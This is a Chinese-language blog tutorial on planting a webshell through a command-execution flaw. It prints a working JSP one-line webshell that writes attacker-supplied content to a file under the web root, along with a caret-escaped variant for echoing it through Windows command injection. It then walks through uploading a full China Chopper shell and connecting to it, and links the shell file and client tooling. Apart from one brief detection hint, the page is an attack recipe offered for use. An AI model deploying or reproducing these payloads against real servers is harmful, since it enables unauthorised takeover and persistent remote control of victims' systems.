<!DOCTYPE html>
<html>
<head>
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>命令执行写webshell | 小白帽</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="">
    <meta name="description" content="1、jsp 版注意：针对 windows 需要通过^转义的字符包括&lt;&gt;和“针对 linux 需要通过\转义1、非菜刀版一句话 1&lt;%if(request.getParameter(&quot;f&quot;)!&#x3D;null)(new java.io.FileOutputStream(application.getRealPath(&quot;&#x2F;&quot;)+request.getParameter(&quot;f&quot;))).wri">
<meta property="og:type" content="article">
<meta property="og:title" content="命令执行写webshell">
<meta property="og:url" content="https://www.yuque.com/xiaogege-yxttw/2020/08/06/rqob7g/index.html">
<meta property="og:site_name" content="小白帽">
<meta property="og:description" content="1、jsp 版注意：针对 windows 需要通过^转义的字符包括&lt;&gt;和“针对 linux 需要通过\转义1、非菜刀版一句话 1&lt;%if(request.getParameter(&quot;f&quot;)!&#x3D;null)(new java.io.FileOutputStream(application.getRealPath(&quot;&#x2F;&quot;)+request.getParameter(&quot;f&quot;))).wri">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1593417611808-746754f6-4b44-429d-8f76-610519803459.png#align=left&display=inline&height=205&margin=%5Bobject%20Object%5D&name=image.png&originHeight=409&originWidth=1920&size=42469&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1593417737679-4fb0068f-5698-44fc-b02c-eeb95fa4d4a3.png#align=left&display=inline&height=166&margin=%5Bobject%20Object%5D&name=image.png&originHeight=332&originWidth=1914&size=86637&status=done&style=none&width=957">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1593417940305-2a4eb7ee-1cf2-48d2-adb2-6329a7825a34.png#align=left&display=inline&height=382&margin=%5Bobject%20Object%5D&name=image.png&originHeight=763&originWidth=1460&size=82521&status=done&style=none&width=730">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1593418762577-f26856be-2e9c-496b-8589-2bbc12728670.png#align=left&display=inline&height=86&margin=%5Bobject%20Object%5D&name=image.png&originHeight=171&originWidth=1821&size=16610&status=done&style=none&width=910.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1593418008814-4fc0ac34-4319-4b94-90e9-6c1d30e4a48c.png#align=left&display=inline&height=369&margin=%5Bobject%20Object%5D&name=image.png&originHeight=704&originWidth=1424&size=139593&status=done&style=none&width=746">
<meta property="article:published_time" content="2020-08-06T14:49:23.000Z">
<meta property="article:modified_time" content="2020-08-14T15:17:20.710Z">
<meta property="article:author" content="无名之辈">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1593417611808-746754f6-4b44-429d-8f76-610519803459.png#align=left&display=inline&height=205&margin=%5Bobject%20Object%5D&name=image.png&originHeight=409&originWidth=1920&size=42469&status=done&style=none&width=960">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

<meta name="generator" content="Hexo 4.2.1"></head>

<body>

    <main id="main">
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">命令执行写webshell</h1>
        <h5 class="subtitle">
            
                <time datetime="2020-08-06T14:49:23.000Z" itemprop="datePublished" class="page-time">
  2020-08-06
</time>


            
        </h5>
    </div>

    


</header>
<meta name="referrer" content="no-referrer" />
<script type="text/javascript" src="hexo_resize_image.js"></script>

<div class="container body-wrap">
    


<article id="post-rqob7g"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">命令执行写webshell</h1>
        <div class="post-meta">
            <time class="post-time" title="2020-08-06 22:49:23" datetime="2020-08-06T14:49:23.000Z"  itemprop="datePublished">2020-08-06</time>

            


            


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <h2 id="1、jsp-版"><a href="#1、jsp-版" class="headerlink" title="1、jsp 版"></a>1、jsp 版</h2><p>注意：通过命令执行写文件时，内容中的特殊字符要先按目标系统的命令行规则转义。<br>针对 Windows，需要用 ^ 转义的字符包括 &lt;、&gt; 和 "；<br>针对 Linux，需要用 \ 转义。<br>1、非菜刀版一句话</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%<span class="keyword">if</span>(request.getParameter(<span class="string">"f"</span>)!=<span class="literal">null</span>)(<span class="keyword">new</span> java.io.FileOutputStream(application.getRealPath(<span class="string">"/"</span>)+request.getParameter(<span class="string">"f"</span>))).write(request.getParameter(<span class="string">"t"</span>).getBytes());%&gt;</span><br></pre></td></tr></table></figure>

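<p>这段代码的作用是：请求中带有参数 f 时，把参数 t 的内容写入 Web 应用根目录下以 f 命名的文件；排查时可留意该目录中新出现的文件，以及同时携带 f、t 参数的请求。按上述 Windows 规则用 ^ 转义后，变形成为：</p>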
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">^&lt;%<span class="keyword">if</span>(request.getParameter(^<span class="string">"f^"</span>)!=<span class="literal">null</span>)(<span class="keyword">new</span> java.io.FileOutputStream(application.getRealPath(^<span class="string">"/^"</span>)+request.getParameter(^<span class="string">"f^"</span>))).write(request.getParameter(^<span class="string">"t^"</span>).getBytes());%^&gt;</span><br></pre></td></tr></table></figure>

<p>2、通过<a href="https://www.yuque.com/attachments/yuque/0/2020/jar/258143/1596725364326-3beda629-4236-4ce4-a4b3-ae7d88b73e29.jar?_lake_card=%7B%22uid%22%3A%221593417464909-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fjar%2F258143%2F1596725364326-3beda629-4236-4ce4-a4b3-ae7d88b73e29.jar%22%2C%22name%22%3A%22CTFcrackTools.jar%22%2C%22size%22%3A10782824%2C%22type%22%3A%22%22%2C%22ext%22%3A%22jar%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22e0Ug9%22%2C%22card%22%3A%22file%22%7D">CTFcrackTools.jar</a>对 echo 等内容进行 url 编码</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1593417611808-746754f6-4b44-429d-8f76-610519803459.png#align=left&display=inline&height=205&margin=%5Bobject%20Object%5D&name=image.png&originHeight=409&originWidth=1920&size=42469&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>3、写入非菜刀版一句话</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1593417737679-4fb0068f-5698-44fc-b02c-eeb95fa4d4a3.png#align=left&display=inline&height=166&margin=%5Bobject%20Object%5D&name=image.png&originHeight=332&originWidth=1914&size=86637&status=done&style=none&width=957" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>4、访问<a href="https://www.yuque.com/attachments/yuque/0/2020/html/258143/1596725364457-638d450e-2ebd-45bd-b14e-f80e4ff3ee63.html?_lake_card=%7B%22uid%22%3A%221593417829272-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fhtml%2F258143%2F1596725364457-638d450e-2ebd-45bd-b14e-f80e4ff3ee63.html%22%2C%22name%22%3A%22jsp%E4%B8%80%E5%8F%A5%E8%AF%9D%E5%AE%A2%E6%88%B7%E7%AB%AF.html%22%2C%22size%22%3A668%2C%22type%22%3A%22text%2Fhtml%22%2C%22ext%22%3A%22html%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22WEoLT%22%2C%22card%22%3A%22file%22%7D">jsp 一句话客户端.html</a>，上传菜刀版 shell<a href="https://www.yuque.com/attachments/yuque/0/2020/jsp/258143/1596725364594-bfd9e462-b29d-48fd-9029-455a26b78aba.jsp?_lake_card=%7B%22uid%22%3A%221593417974391-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fjsp%2F258143%2F1596725364594-bfd9e462-b29d-48fd-9029-455a26b78aba.jsp%22%2C%22name%22%3A%221.jsp%22%2C%22size%22%3A9129%2C%22type%22%3A%22%22%2C%22ext%22%3A%22jsp%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22evfM2%22%2C%22card%22%3A%22file%22%7D">1.jsp</a></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1593417940305-2a4eb7ee-1cf2-48d2-adb2-6329a7825a34.png#align=left&display=inline&height=382&margin=%5Bobject%20Object%5D&name=image.png&originHeight=763&originWidth=1460&size=82521&status=done&style=none&width=730" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>5、连接菜刀成功</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1593418762577-f26856be-2e9c-496b-8589-2bbc12728670.png#align=left&display=inline&height=86&margin=%5Bobject%20Object%5D&name=image.png&originHeight=171&originWidth=1821&size=16610&status=done&style=none&width=910.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1593418008814-4fc0ac34-4319-4b94-90e9-6c1d30e4a48c.png#align=left&display=inline&height=369&margin=%5Bobject%20Object%5D&name=image.png&originHeight=704&originWidth=1424&size=139593&status=done&style=none&width=746" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    Last updated: <time datetime="2020-08-14T15:17:20.710Z" itemprop="dateUpdated">2020-08-14 23:17:20</time>
</span><br>


        
        
    </div>
    
    <footer>
        <a href="https://www.yuque.com/xiaogege-yxttw">
            <img src="/img/avatar.jpg" alt="无名之辈">
            无名之辈
        </a>
    </footer>
</blockquote>

        
    </div>

    



    




















</article>




</div>

        <footer class="footer">
    <div class="top">
        


        <p>
            
            <span>This blog is licensed under a <a rel="license noopener" href="https://creativecommons.org/licenses/by/4.0/" target="_blank">Creative Commons Attribution 4.0 International License</a>.</span>
        </p>
    </div>
    <div class="bottom">
        <p><span>无名之辈 &copy; 2015 - 2020</span>
            <span>
                
                Power by <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a>
            </span>
        </p>
    </div>
</footer>

    </main>




    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: true, REWARD: true };


</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>








<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



<script>
(function () {
    // Capture the page title once, at script run time, so it can be restored later.
    var savedTitle = document.title;
    // Handle of the pending "restore the title" timer, if any.
    var restoreTimer;

    /**
     * Swap the tab title whenever the page is hidden or shown again.
     * Hidden: show the "away" text and cancel any pending restore.
     * Visible: show the "back" text, then restore the saved title after 2 s.
     */
    function onVisibilityChange() {
        if (!document.hidden) {
            document.title = '(つェ⊂)咦!又好了!';
            restoreTimer = setTimeout(function () {
                document.title = savedTitle;
            }, 2000);
            return;
        }

        document.title = '死鬼去哪里了！';
        // Without this, a restore scheduled just before hiding would overwrite the "away" text.
        clearTimeout(restoreTimer);
    }

    document.addEventListener('visibilitychange', onVisibilityChange);
})();
</script>



	<script type="text/javascript" src="hexo_resize_image.js"></script>
</body>
</html>
